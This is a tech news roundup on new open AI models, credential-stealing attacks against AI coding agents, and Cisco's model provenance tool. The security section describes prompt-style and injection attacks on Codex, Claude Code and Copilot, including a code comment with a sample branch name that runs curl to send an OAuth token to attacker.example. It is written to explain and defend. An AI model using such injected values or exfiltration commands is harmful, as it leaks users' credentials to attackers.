Poolside, a San Francisco-based AI startup founded in 2023, on Tuesday launched two new open source Laguna large language models optimized for autonomous coding workflows. According to VentureBeat, the release marks a significant entry from a U.S. company into the increasingly competitive open source AI model space dominated by Chinese firms.
The launch comes alongside new releases from Chinese AI companies, including SenseTime’s SenseNova U1 image model and ongoing security concerns around AI coding agents following multiple credential-based exploits.
Poolside’s Laguna Models Target Agentic Coding
Poolside’s Laguna XS.2 models are designed specifically for agentic workflows — AI systems that can write code, use third-party tools, and take autonomous actions beyond simple chat or content generation. The company released both models under open source licensing, positioning them as affordable alternatives to proprietary frontier models from OpenAI and Anthropic.
According to Poolside’s announcement, the models offer “affordable intelligence” while maintaining competitive performance on coding tasks. The company also launched “pool,” a coding agent harness, and “shimmer,” a web-based, mobile-optimized development environment for interactive code preview.
The timing reflects broader market dynamics where Chinese companies like DeepSeek and Xiaomi have gained ground by offering near-frontier performance at significantly lower costs than U.S. proprietary models. Poolside’s entry represents a rare U.S. contribution to the open source AI model ecosystem.
SenseTime Releases Speed-Optimized Image Model
Chinese AI company SenseTime on Tuesday released SenseNova U1, an open source model that processes images directly without first converting them to text. According to Wired, this approach significantly reduces computing requirements and processing time compared to competing U.S. models.
“The model’s entire reasoning process is no longer limited to text. It can reason with images as well,” Dahua Lin, SenseTime’s cofounder and chief scientist, told Wired. Lin, who also serves as a professor at the Chinese University of Hong Kong, said direct image processing capabilities will enable robots to better understand physical environments.
SenseTime designed U1 to run on Chinese-made chips, addressing U.S. export restrictions that limit Chinese firms’ access to advanced Western semiconductors. Ten Chinese chip designers, including Cambricon and Biren Technology, announced compatibility with U1 on release day.
The company released U1 for free on Hugging Face and GitHub, continuing the trend of Chinese firms becoming major contributors to open source AI development. SenseTime, which is under U.S. government sanctions, has been seeking to regain its standing after slipping in China’s competitive AI landscape.
Security Vulnerabilities Plague AI Coding Agents
Multiple AI coding assistants, including OpenAI’s Codex, Anthropic’s Claude Code, and Microsoft’s Copilot, have suffered credential-based security exploits over the past nine months. According to VentureBeat, every successful attack targeted credentials rather than the AI models themselves.
BeyondTrust researchers demonstrated that a crafted GitHub branch name could steal Codex’s OAuth token in cleartext, a flaw OpenAI classified as Critical P1. Days later, Claude Code’s source code leaked to the public npm registry, and security firm Adversa discovered that the system ignored its own security rules once a command chained more than 50 subcommands.
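The branch-name exploit is an instance of a classic injection pattern. As a minimal, hypothetical sketch (not BeyondTrust’s actual proof of concept), an agent that splices an untrusted branch name into a shell command gives an attacker a place to smuggle in extra commands that can read tokens from the environment:

```python
import subprocess

# Hypothetical illustration of the injection class, not the actual exploit.
# With shell=True, the untrusted branch name is parsed by the shell, so a
# crafted name such as:
#   fix/login; curl https://attacker.example/?t=$OAUTH_TOKEN
# appends a second command that exfiltrates a token from the environment.
def checkout_unsafe(branch_name: str) -> None:
    subprocess.run(f"git checkout {branch_name}", shell=True, check=True)

# Passing arguments as a list bypasses shell parsing, so the branch name is
# handed to git as a single literal argument and cannot inject commands.
def checkout_safe(branch_name: str) -> None:
    subprocess.run(["git", "checkout", branch_name], check=True)
```

The list form is the standard mitigation for this class of bug; the deeper issue the researchers point to is that the agent holds a long-lived token its shell environment can see at all.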
“Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system,” Merritt Baer, CSO at Enkrypt AI and former Deputy CISO at AWS, told VentureBeat. The pattern reveals that AI coding agents authenticate to production systems without proper human session anchoring.
The vulnerability pattern was first demonstrated at Black Hat USA 2025, when Zenity CTO Michael Bargury hijacked multiple AI systems, including ChatGPT, Microsoft Copilot Studio, and Google Gemini, through a Jira MCP integration. Nine months later, credential theft remains the primary attack vector.
Cisco Addresses AI Model Provenance Challenges
Cisco on Thursday released Model Provenance Kit, an open source tool designed to help organizations track and verify third-party AI models. According to SecurityWeek, the tool addresses security and compliance risks associated with models from repositories like Hugging Face, where millions of models are available with varying levels of documentation.
Organizations often deploy AI models without tracking modifications or verifying developer claims about model sources, vulnerabilities, and training biases. “If unaccounted for, those vulnerabilities can continue to propagate, whether they affect an internal chatbot, an agent application, or a customer-facing tool,” Cisco explained in its announcement.
The lack of model provenance creates multiple risk categories: security vulnerabilities from poisoned or manipulated models, compliance issues related to government AI documentation requirements, and supply chain integrity problems from unverified developer claims. Without proper lineage tracking, organizations cannot trace incidents to root causes or determine which other models in their technology stack face similar risks.
Cisco’s tool aims to provide transparency into model development history, enabling better risk assessment and incident response capabilities for enterprise AI deployments.
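Cisco has not published the kit’s internals in the announcement, but the baseline step behind any provenance tracking can be sketched simply: pin every model artifact to a cryptographic digest at intake so later modifications are detectable. The snippet below is an illustrative sketch of that idea, not Cisco’s implementation; the directory path and output format are assumptions.

```python
import hashlib
import json
from pathlib import Path

def _sha256(path: Path) -> str:
    """Hash a file in 1 MiB chunks so multi-gigabyte weights fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def fingerprint_model(model_dir: str) -> dict:
    """Map each file under a model directory to its SHA-256 digest.

    Illustrative only: a real provenance tool also records the source
    repository, revision, license, and training metadata.
    """
    root = Path(model_dir)
    return {
        str(p.relative_to(root)): _sha256(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }

# Taking a fingerprint at intake and re-checking it later reveals any file
# that was swapped or modified after the model entered the stack.
if __name__ == "__main__":
    print(json.dumps(fingerprint_model("models/downloaded-model"), indent=2))
```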
What This Means
The simultaneous release of multiple open source AI models signals intensifying competition in the AI development landscape. Poolside’s entry demonstrates that U.S. companies can compete in open source AI, challenging the narrative that Chinese firms dominate this space due to regulatory and economic advantages.
SenseTime’s focus on Chinese chip compatibility highlights how geopolitical tensions are driving technological bifurcation. Companies are designing AI systems specifically to work within their respective regulatory and supply chain constraints, potentially creating parallel AI ecosystems.
The persistent security vulnerabilities in AI coding agents reveal fundamental architectural problems that extend beyond individual companies or models. The pattern of credential-based attacks suggests enterprises need new security frameworks specifically designed for AI agent deployments, rather than treating them as traditional software applications.
FAQ
What makes Poolside’s Laguna models different from other coding AI?
Laguna models are specifically optimized for agentic workflows, meaning they can autonomously write code, use tools, and take actions beyond simple code generation. They are released under open source licenses and positioned as affordable alternatives to proprietary frontier models, targeting developers who want local deployment options.
Why can’t Chinese AI companies use the best chips for training?
U.S. export controls restrict Chinese firms from accessing advanced AI training chips, primarily those made by NVIDIA and other Western companies. This forces Chinese companies to design models that work with domestically produced semiconductors, which typically offer lower performance.
How do credential attacks against AI coding agents work?
Attackers exploit the fact that AI coding agents hold credentials to access production systems like GitHub or cloud platforms. By manipulating inputs (like malicious branch names), attackers can trick the AI into exposing these credentials or performing unauthorized actions using them.
Related news
- Trezor: “Open source is the very basic pillar of security” amid AI risks and quantum threats – The Cryptonomist
- DenseOn with the LateOn: Open State-of-the-Art Single and Multi-Vector Models – HuggingFace Blog
- NVIDIA Isaac GR00T N1.7: Open Reasoning VLA Model for Humanoid Robots – HuggingFace Blog